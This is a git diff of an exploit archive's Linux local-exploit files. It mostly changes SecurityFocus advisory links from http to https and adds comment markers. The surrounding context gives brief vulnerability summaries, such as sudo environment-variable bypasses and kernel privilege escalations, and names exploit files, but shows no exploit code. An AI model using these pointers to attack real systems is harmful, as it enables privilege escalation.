@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10499/info +// source: https://www.securityfocus.com/bid/10499/info CVS is prone to multiple vulnerabilities. The issues include a double free vulnerability, format string vulnerabilities, and integer overflows. There is also a null termination issue in the security patch for BID 10384, potentially leading to a server crash. Some of these issues may be leveraged to execute arbitrary code, while other issues may only result in a denial of service. diff --git a/exploits/linux/local/24278.sh b/exploits/linux/local/24278.sh index f063cb9ac..f87490eed 100755 --- a/exploits/linux/local/24278.sh +++ b/exploits/linux/local/24278.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10717/info +source: https://www.securityfocus.com/bid/10717/info IM-Switch Insecure Temporary File Handling Symbolic Link VulnerabilityIt is reported that im-switch is prone to a local insecure temporary file handling symbolic link vulnerability. This issue is due to a design error that allows the application to insecurely write to a temporary file that is created with a predictable file name. diff --git a/exploits/linux/local/24398.sh b/exploits/linux/local/24398.sh index 34e84988e..d2a19e987 100755 --- a/exploits/linux/local/24398.sh +++ b/exploits/linux/local/24398.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11008/info +source: https://www.securityfocus.com/bid/11008/info IMWheel is reported prone to a predictable temporary file creation vulnerability. This issue is a race condition error and may allow a local attacker to carry out denial of service attacks against other users and possibly gain elevated privileges. diff --git a/exploits/linux/local/24406.txt b/exploits/linux/local/24406.txt index 5de8fdf1e..397a1b94d 100644 --- a/exploits/linux/local/24406.txt +++ b/exploits/linux/local/24406.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11025/info +source: https://www.securityfocus.com/bid/11025/info Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames. diff --git a/exploits/linux/local/24421.c b/exploits/linux/local/24421.c index 67a392697..1a1224fd9 100644 --- a/exploits/linux/local/24421.c +++ b/exploits/linux/local/24421.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11077/info +// source: https://www.securityfocus.com/bid/11077/info The calendar utility contained in the bsdmainutils package on Debian GNU/Linux systems is reported susceptible to an information disclosure vulnerability. This is due to a lack of proper file authorization checks by the application. diff --git a/exploits/linux/local/24570.txt b/exploits/linux/local/24570.txt index 7b7c71df9..85b8f1049 100644 --- a/exploits/linux/local/24570.txt +++ b/exploits/linux/local/24570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11105/info +source: https://www.securityfocus.com/bid/11105/info QNX PPoEd is reported prone to a problem that exists in the handling of paths to external executables that are employed by PPPoEd. Because of this, an attacker may be able to gain elevated privileges on a host with a vulnerable version of PPPoEd installed. diff --git a/exploits/linux/local/24606.c b/exploits/linux/local/24606.c index f333bbbb0..a95f99931 100644 --- a/exploits/linux/local/24606.c +++ b/exploits/linux/local/24606.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11204/info +// source: https://www.securityfocus.com/bid/11204/info Sudo is reported prone to an information disclosure vulnerability. diff --git a/exploits/linux/local/24694.c b/exploits/linux/local/24694.c index 8172c9355..72610c607 100644 --- a/exploits/linux/local/24694.c +++ b/exploits/linux/local/24694.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11471/info +// source: https://www.securityfocus.com/bid/11471/info The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow. diff --git a/exploits/linux/local/24749.sh b/exploits/linux/local/24749.sh index b567cc859..287164435 100755 --- a/exploits/linux/local/24749.sh +++ b/exploits/linux/local/24749.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11697/info +source: https://www.securityfocus.com/bid/11697/info Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it. diff --git a/exploits/linux/local/24750.c b/exploits/linux/local/24750.c index 5f582a906..e9ccaa9d4 100644 --- a/exploits/linux/local/24750.c +++ b/exploits/linux/local/24750.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11697/info +// source: https://www.securityfocus.com/bid/11697/info Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it. diff --git a/exploits/linux/local/24757.java b/exploits/linux/local/24757.java index 9e2e1ad72..fa52b089f 100644 --- a/exploits/linux/local/24757.java +++ b/exploits/linux/local/24757.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11712/info +source: https://www.securityfocus.com/bid/11712/info Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation. diff --git a/exploits/linux/local/24758.java b/exploits/linux/local/24758.java index cdf96e60a..2016fde5d 100644 --- a/exploits/linux/local/24758.java +++ b/exploits/linux/local/24758.java 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11712/info +source: https://www.securityfocus.com/bid/11712/info Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation. diff --git a/exploits/linux/local/25106.c b/exploits/linux/local/25106.c index 6d4844633..fc6bf8760 100644 --- a/exploits/linux/local/25106.c +++ b/exploits/linux/local/25106.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12569/info +// source: https://www.securityfocus.com/bid/12569/info typespeed is prone to a local format string vulnerability. Successful could allow privilege escalation. diff --git a/exploits/linux/local/25202.c b/exploits/linux/local/25202.c index 4f218870f..bc351116b 100644 --- a/exploits/linux/local/25202.c +++ b/exploits/linux/local/25202.c @@ -1,7 +1,7 @@ /* EDB Note: Updated exploit can be found here; https://www.exploit-db.com/exploits/25203/ -source: http://www.securityfocus.com/bid/12763/info +source: https://www.securityfocus.com/bid/12763/info A Local integer overflow vulnerability affects the Linux kernel. This issue is due to a failure of the affected kernel to properly handle user-supplied size values. diff --git a/exploits/linux/local/25288.c b/exploits/linux/local/25288.c index 805551db8..25594ef5b 100644 --- a/exploits/linux/local/25288.c +++ b/exploits/linux/local/25288.c @@ -1,7 +1,7 @@ /* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ -source: http://www.securityfocus.com/bid/12911/info +source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. diff --git a/exploits/linux/local/25289.c b/exploits/linux/local/25289.c index 7405ba6dc..2635dac25 100644 --- a/exploits/linux/local/25289.c +++ b/exploits/linux/local/25289.c 
@@ -1,7 +1,7 @@ /* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/ -source: http://www.securityfocus.com/bid/12911/info +source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. diff --git a/exploits/linux/local/25688.txt b/exploits/linux/local/25688.txt index 429bbe137..fd7d2f242 100644 --- a/exploits/linux/local/25688.txt +++ b/exploits/linux/local/25688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13699/info +source: https://www.securityfocus.com/bid/13699/info gEdit is prone to a format-string vulnerability. Exploitation may occur when the program is invoked with a filename that includes malicious format specifiers. diff --git a/exploits/linux/local/25707.txt b/exploits/linux/local/25707.txt index 3e14ee8ef..bba71cba6 100644 --- a/exploits/linux/local/25707.txt +++ b/exploits/linux/local/25707.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13775/info +source: https://www.securityfocus.com/bid/13775/info Both cryptoloop and dm-crypt are reported prone to an information disclosure vulnerability. Reports indicate that certain watermarked files may be detected on a filesystem that is encrypted using the affected loop device encryption schemes. diff --git a/exploits/linux/local/25709.sh b/exploits/linux/local/25709.sh index 06e81f117..dea927d6c 100755 --- a/exploits/linux/local/25709.sh +++ b/exploits/linux/local/25709.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13780/info +source: https://www.securityfocus.com/bid/13780/info Gentoo webapp-config is prone to an insecure file creation vulnerability. This issue is due to a design error that causes the application to fail to verify the existence of a file before writing to it. diff --git a/exploits/linux/local/25789.c b/exploits/linux/local/25789.c index 17cc77e05..56d9a1473 100644 
--- a/exploits/linux/local/25789.c +++ b/exploits/linux/local/25789.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13857/info +// source: https://www.securityfocus.com/bid/13857/info FUSE is susceptible to a local information disclosure vulnerability. This issue is due to a failure of the kernel module to properly clear used memory prior to its reuse. diff --git a/exploits/linux/local/25947.txt b/exploits/linux/local/25947.txt index 9194227d4..0a976317f 100644 --- a/exploits/linux/local/25947.txt +++ b/exploits/linux/local/25947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14169/info +source: https://www.securityfocus.com/bid/14169/info GNU GNATS gen-index allows local attackers to disclose and overwrite arbitrary files. diff --git a/exploits/linux/local/25993.sh b/exploits/linux/local/25993.sh index 8c0a27c77..a771b468f 100755 --- a/exploits/linux/local/25993.sh +++ b/exploits/linux/local/25993.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14293/info +source: https://www.securityfocus.com/bid/14293/info Skype is affected by an insecure temporary file creation vulnerability. diff --git a/exploits/linux/local/26100.sh b/exploits/linux/local/26100.sh index 804ce5600..ddded0ba0 100755 --- a/exploits/linux/local/26100.sh +++ b/exploits/linux/local/26100.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14486/info +source: https://www.securityfocus.com/bid/14486/info Lantronix Secure Console Server SCS820/SCS1620 devices are susceptible to multiple local vulnerabilities. diff --git a/exploits/linux/local/26195.txt b/exploits/linux/local/26195.txt index dc8b350e0..95dc5c11d 100644 --- a/exploits/linux/local/26195.txt +++ b/exploits/linux/local/26195.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14656/info +source: https://www.securityfocus.com/bid/14656/info QNX RTOS is susceptible to a local arbitrary file disclosure vulnerability. This issue is due to a failure of the 'inputtrap' utility to properly implement access control restrictions. diff --git a/exploits/linux/local/26218.txt b/exploits/linux/local/26218.txt index 641ff4614..7a951dea2 100644 --- a/exploits/linux/local/26218.txt +++ b/exploits/linux/local/26218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14711/info +source: https://www.securityfocus.com/bid/14711/info Frox is prone to a vulnerability that permits read access to arbitrary files. diff --git a/exploits/linux/local/26321.c b/exploits/linux/local/26321.c index 1d58559ee..165ca0416 100644 --- a/exploits/linux/local/26321.c +++ b/exploits/linux/local/26321.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15004/info +// source: https://www.securityfocus.com/bid/15004/info 'gnome-pty-helper' is susceptible to a local UTMP hostname spoofing vulnerability. This issue is due to the failure of the application to properly validate user-supplied data prior to using it to update UTMP records. diff --git a/exploits/linux/local/26353.txt b/exploits/linux/local/26353.txt index 69b8d0173..5421e8cc9 100644 --- a/exploits/linux/local/26353.txt +++ b/exploits/linux/local/26353.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15122/info +source: https://www.securityfocus.com/bid/15122/info The Linux kernel is susceptible to a local command-injection vulnerability via console keymap modifications. This issue occurs because unprivileged users can alter the system-wide console keymap. diff --git a/exploits/linux/local/26492.txt b/exploits/linux/local/26492.txt index 5c5875277..170c5e163 100644 --- a/exploits/linux/local/26492.txt +++ b/exploits/linux/local/26492.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15375/info +source: https://www.securityfocus.com/bid/15375/info Emacs is susceptible to an arbitrary command execution vulnerability with local variables. This issue is due to insufficient sanitization of user-supplied input. diff --git a/exploits/linux/local/26498.txt b/exploits/linux/local/26498.txt index 5b0b3f30f..4485449a5 100644 --- a/exploits/linux/local/26498.txt +++ b/exploits/linux/local/26498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15394/info +source: https://www.securityfocus.com/bid/15394/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB', 'PERL5LIB', and 'PERL5OPT' environment variables when tainting is ignored. @@ -8,7 +8,7 @@ To exploit this vulnerability, an attacker must be able to run Perl scripts thro ## Sudo local root exploit ## ## vuln versions : sudo < 1.6.8p12 -## adv : http://www.securityfocus.com/bid/15394 +## adv : https://www.securityfocus.com/bid/15394 ## adv : http://www.frsirt.com/bulletins/2642 ##by breno - breno@kalangolinux.org diff --git a/exploits/linux/local/27056.pl b/exploits/linux/local/27056.pl index b720e4bc8..37049c186 100755 --- a/exploits/linux/local/27056.pl +++ b/exploits/linux/local/27056.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16184/info +source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. 
@@ -10,7 +10,7 @@ This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Secu ## Sudo local root exploit ## ## vuln versions : sudo < 1.6.8p12 -## adv : http://www.securityfocus.com/bid/15394 +## adv : https://www.securityfocus.com/bid/15394 ## adv : http://www.frsirt.com/bulletins/2642 ##by breno - breno@kalangolinux.org diff --git a/exploits/linux/local/27057.py b/exploits/linux/local/27057.py index 99e818188..6997c2e21 100755 --- a/exploits/linux/local/27057.py +++ b/exploits/linux/local/27057.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16184/info +source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. @@ -10,7 +10,7 @@ This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Secu ## Sudo local root escalation privilege ## ## vuln versions : sudo < 1.6.8p10 -## adv : http://www.securityfocus.com/bid/16184 +## adv : https://www.securityfocus.com/bid/16184 ## by breno - breno at kalangolinux dot org ## You need sudo access execution for some python script ## diff --git a/exploits/linux/local/27065.txt b/exploits/linux/local/27065.txt index c6f0a8039..b95068a9a 100644 --- a/exploits/linux/local/27065.txt +++ b/exploits/linux/local/27065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16205/info +source: https://www.securityfocus.com/bid/16205/info Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges. diff --git a/exploits/linux/local/27066.txt b/exploits/linux/local/27066.txt index a73bb02e4..d2ce97dc7 100644 --- a/exploits/linux/local/27066.txt +++ b/exploits/linux/local/27066.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16205/info +source: https://www.securityfocus.com/bid/16205/info Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges. diff --git a/exploits/linux/local/27231.txt b/exploits/linux/local/27231.txt index b1ba3c3a5..297f50928 100644 --- a/exploits/linux/local/27231.txt +++ b/exploits/linux/local/27231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16663/info +source: https://www.securityfocus.com/bid/16663/info GnuPG is affected by a detached signature verification-bypass vulnerability because it fails to properly notify scripts that an invalid detached signature was presented and that the verification process has failed. diff --git a/exploits/linux/local/27461.c b/exploits/linux/local/27461.c index c27c961fa..1823dade3 100644 --- a/exploits/linux/local/27461.c +++ b/exploits/linux/local/27461.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/17203/info +source: https://www.securityfocus.com/bid/17203/info The Linux kernel is affected by local memory-disclosure vulnerabilities. These issues are due to the kernel's failure to properly clear previously used kernel memory before returning it to local users. diff --git a/exploits/linux/local/27766.txt b/exploits/linux/local/27766.txt index ad75b5566..ed41e4d5c 100644 --- a/exploits/linux/local/27766.txt +++ b/exploits/linux/local/27766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17735/info +source: https://www.securityfocus.com/bid/17735/info The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data. diff --git a/exploits/linux/local/27769.txt b/exploits/linux/local/27769.txt index 4b85a2603..bb9c89cec 100644 
--- a/exploits/linux/local/27769.txt +++ b/exploits/linux/local/27769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17742/info +source: https://www.securityfocus.com/bid/17742/info The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data. diff --git a/exploits/linux/local/28287.c b/exploits/linux/local/28287.c index 7ee9c20dc..ccb9644f6 100644 --- a/exploits/linux/local/28287.c +++ b/exploits/linux/local/28287.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19186/info +// source: https://www.securityfocus.com/bid/19186/info Since Linux-HA Heartbeat has insecure default permissions set on shared memory, local attackers may be able to cause a denial of service. diff --git a/exploits/linux/local/28288.c b/exploits/linux/local/28288.c index 777036ce4..1632e2791 100644 --- a/exploits/linux/local/28288.c +++ b/exploits/linux/local/28288.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19190/info +// source: https://www.securityfocus.com/bid/19190/info Midirecord is prone to a local buffer-overflow vulnerability because it fails to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. diff --git a/exploits/linux/local/28405.txt b/exploits/linux/local/28405.txt index ca2dc2a13..1104fbd68 100644 --- a/exploits/linux/local/28405.txt +++ b/exploits/linux/local/28405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19596/info +source: https://www.securityfocus.com/bid/19596/info Roxio Toast is prone to a local privilege-escalation vulnerability because it fails to properly sanitize user-supplied input. As a result, local users may set their own search path for external applications that are called by setuid programs that are included in Roxio Toast. diff --git a/exploits/linux/local/28806.txt b/exploits/linux/local/28806.txt index bdbbce5c3..bc5c0d364 100644 
--- a/exploits/linux/local/28806.txt +++ b/exploits/linux/local/28806.txt @@ -107,7 +107,7 @@ clean: # Version: 1.4.6 (tested), 1.4.7 (untested) # Tested on: Xubuntu 12.04 x86_64 # CVE: 2013-4362 -# Info: Vulnerability reported by Werner Baumann: http://www.securityfocus.com/bid/62445 +# Info: Vulnerability reported by Werner Baumann: https://www.securityfocus.com/bid/62445 KERNELV=`uname -r` echo "#######################################" diff --git a/exploits/linux/local/29446.c b/exploits/linux/local/29446.c index 73b466fb5..cf80efb5f 100644 --- a/exploits/linux/local/29446.c +++ b/exploits/linux/local/29446.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/22014/info +source: https://www.securityfocus.com/bid/22014/info Grsecurity Kernel PaX is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/29467.c b/exploits/linux/local/29467.c index d45dbbf75..8f944890f 100644 --- a/exploits/linux/local/29467.c +++ b/exploits/linux/local/29467.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22071/info +// source: https://www.securityfocus.com/bid/22071/info Rixstep Undercover is prone to a local privilege-escalation vulnerability because of a design error in the affected application. diff --git a/exploits/linux/local/29714.txt b/exploits/linux/local/29714.txt index 605b5436a..0ddc59ff7 100644 --- a/exploits/linux/local/29714.txt +++ b/exploits/linux/local/29714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22823/info +source: https://www.securityfocus.com/bid/22823/info The Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/29746.txt b/exploits/linux/local/29746.txt index 78a95cb11..4af592bd5 100644 --- a/exploits/linux/local/29746.txt +++ b/exploits/linux/local/29746.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22985/info +source: https://www.securityfocus.com/bid/22985/info Horde Framework and IMP are prone to a vulnerability that allows a local attacker to delete arbitrary files in the context of the user running the application. diff --git a/exploits/linux/local/29822.c b/exploits/linux/local/29822.c index b6fe3ed88..e7ea3f44a 100644 --- a/exploits/linux/local/29822.c +++ b/exploits/linux/local/29822.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23355/info +// source: https://www.securityfocus.com/bid/23355/info The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation. diff --git a/exploits/linux/local/29954.txt b/exploits/linux/local/29954.txt index b76fe5421..62a1408b2 100644 --- a/exploits/linux/local/29954.txt +++ b/exploits/linux/local/29954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23844/info +source: https://www.securityfocus.com/bid/23844/info ELinks is prone to an arbitrary code-execution vulnerability. diff --git a/exploits/linux/local/30093.txt b/exploits/linux/local/30093.txt index e131f7e02..36b690c9a 100644 --- a/exploits/linux/local/30093.txt +++ b/exploits/linux/local/30093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24192/info +source: https://www.securityfocus.com/bid/24192/info Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation. diff --git a/exploits/linux/local/30280.txt b/exploits/linux/local/30280.txt index 3d01d7109..59e6af01a 100644 --- a/exploits/linux/local/30280.txt +++ b/exploits/linux/local/30280.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24780/info +source: https://www.securityfocus.com/bid/24780/info GFAX is prone to a vulnerability that lets local attackers execute arbitrary commands with superuser privileges. Successful attacks will result in the complete compromise of affected computers. diff --git a/exploits/linux/local/30464.c b/exploits/linux/local/30464.c index 8b2b17721..618e1dbe9 100644 --- a/exploits/linux/local/30464.c +++ b/exploits/linux/local/30464.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/25251/info +source: https://www.securityfocus.com/bid/25251/info GSWKT (Generic Software Wrappers Toolkit) is prone to multiple concurrency vulnerabilities because of its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel. diff --git a/exploits/linux/local/30503.txt b/exploits/linux/local/30503.txt index fafbf790f..966de9aba 100644 --- a/exploits/linux/local/30503.txt +++ b/exploits/linux/local/30503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25342/info +source: https://www.securityfocus.com/bid/25342/info BlueCat Networks Adonis devices are prone to a remote privilege-escalation vulnerability because the software fails to properly sanitize user-supplied input. diff --git a/exploits/linux/local/30604.c b/exploits/linux/local/30604.c index b540e7bb1..d761965b4 100644 --- a/exploits/linux/local/30604.c +++ b/exploits/linux/local/30604.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/25774/info +source: https://www.securityfocus.com/bid/25774/info The Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/30605.c b/exploits/linux/local/30605.c index eb9615817..283303087 100644 --- a/exploits/linux/local/30605.c +++ b/exploits/linux/local/30605.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/25774/info +source: https://www.securityfocus.com/bid/25774/info /* The Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/30620.txt b/exploits/linux/local/30620.txt index 3437335fb..a6cca0c33 100644 --- a/exploits/linux/local/30620.txt +++ b/exploits/linux/local/30620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25825/info +source: https://www.securityfocus.com/bid/25825/info Xen is prone to a local command-injection vulnerability that can lead to privilege escalation. diff --git a/exploits/linux/local/30780.txt b/exploits/linux/local/30780.txt index 5398eae77..232c84b13 100644 --- a/exploits/linux/local/30780.txt +++ b/exploits/linux/local/30780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26503/info +source: https://www.securityfocus.com/bid/26503/info ISPmanager is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/31151.c b/exploits/linux/local/31151.c index ad81be356..422fd037e 100644 --- a/exploits/linux/local/31151.c +++ b/exploits/linux/local/31151.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27744/info +// source: https://www.securityfocus.com/bid/27744/info The GKrellWeather plugin for GKrellM is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/local/31911.txt b/exploits/linux/local/31911.txt index d0d9670db..078420779 100644 --- a/exploits/linux/local/31911.txt +++ b/exploits/linux/local/31911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29715/info +source: https://www.securityfocus.com/bid/29715/info Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/linux/local/31959.txt b/exploits/linux/local/31959.txt index 25582d6a4..ddfd78248 100644 --- a/exploits/linux/local/31959.txt +++ b/exploits/linux/local/31959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29902/info +source: https://www.securityfocus.com/bid/29902/info Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links. diff --git a/exploits/linux/local/32446.txt b/exploits/linux/local/32446.txt index 4bd5d289f..6b88e9e73 100644 --- a/exploits/linux/local/32446.txt +++ b/exploits/linux/local/32446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31499/info +source: https://www.securityfocus.com/bid/31499/info Xen is prone to a vulnerability that results in configuration information being stored in a location that is writable by guest domains. diff --git a/exploits/linux/local/32805.c b/exploits/linux/local/32805.c index 429165e52..a5c98594e 100644 --- a/exploits/linux/local/32805.c +++ b/exploits/linux/local/32805.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/33846/info +source: https://www.securityfocus.com/bid/33846/info The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible operation. diff --git a/exploits/linux/local/32820.txt b/exploits/linux/local/32820.txt index 865d79265..1b27353db 100644 --- a/exploits/linux/local/32820.txt +++ b/exploits/linux/local/32820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33922/info +source: https://www.securityfocus.com/bid/33922/info OpenSC is prone to an unauthorized-access vulnerability. diff --git a/exploits/linux/local/32829.c b/exploits/linux/local/32829.c index dab604886..f82189e79 100644 --- a/exploits/linux/local/32829.c +++ b/exploits/linux/local/32829.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/33948/info +source: https://www.securityfocus.com/bid/33948/info The Linux kernel is prone to a local security-bypass vulnerability. diff --git a/exploits/linux/local/32848.txt b/exploits/linux/local/32848.txt index 3bde077a1..ca59cea4f 100644 --- a/exploits/linux/local/32848.txt +++ b/exploits/linux/local/32848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34080/info +source: https://www.securityfocus.com/bid/34080/info Sun xVM VirtualBox is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/32947.txt b/exploits/linux/local/32947.txt index 630448d15..c72321fec 100644 --- a/exploits/linux/local/32947.txt +++ b/exploits/linux/local/32947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34676/info +source: https://www.securityfocus.com/bid/34676/info DirectAdmin creates temporary files in an insecure manner. diff --git a/exploits/linux/local/33145.c b/exploits/linux/local/33145.c index 6d03fd2f2..097436aaa 100644 --- a/exploits/linux/local/33145.c +++ b/exploits/linux/local/33145.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35924/info +// source: https://www.securityfocus.com/bid/35924/info PHP Fuzzer Framework creates temporary files in an insecure manner. diff --git a/exploits/linux/local/33255.txt b/exploits/linux/local/33255.txt index f047f54fe..8af143eee 100644 --- a/exploits/linux/local/33255.txt +++ b/exploits/linux/local/33255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36523/info +source: https://www.securityfocus.com/bid/36523/info Xen is prone to a local authentication-bypass vulnerability. diff --git a/exploits/linux/local/33321.c b/exploits/linux/local/33321.c index 7f8af8772..353c00c2e 100644 --- a/exploits/linux/local/33321.c +++ b/exploits/linux/local/33321.c 
@@ -1,7 +1,7 @@ /* EDB Note: Updated exploit ~ https://www.exploit-db.com/exploits/33322/ -source: http://www.securityfocus.com/bid/36901/info +source: https://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. diff --git a/exploits/linux/local/33322.c b/exploits/linux/local/33322.c index 8a37702a8..9dd7484e5 100644 --- a/exploits/linux/local/33322.c +++ b/exploits/linux/local/33322.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/36901/info +source: https://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. diff --git a/exploits/linux/local/33395.txt b/exploits/linux/local/33395.txt index 13c8c27ce..c26adc0e9 100644 --- a/exploits/linux/local/33395.txt +++ b/exploits/linux/local/33395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37277/info +source: https://www.securityfocus.com/bid/37277/info Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions. diff --git a/exploits/linux/local/33508.txt b/exploits/linux/local/33508.txt index 92c115058..fbc4c1374 100644 --- a/exploits/linux/local/33508.txt +++ b/exploits/linux/local/33508.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37776/info +source: https://www.securityfocus.com/bid/37776/info GNU Bash is prone to a command-injection vulnerability because it fails to adequately sanitize control characters in the 'ls' command. diff --git a/exploits/linux/local/33523.c b/exploits/linux/local/33523.c index cebbc020c..84b22c7d4 100644 --- a/exploits/linux/local/33523.c +++ b/exploits/linux/local/33523.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/37806/info +source: https://www.securityfocus.com/bid/37806/info Linux kernel is prone to a local privilege-escalation vulnerability. 
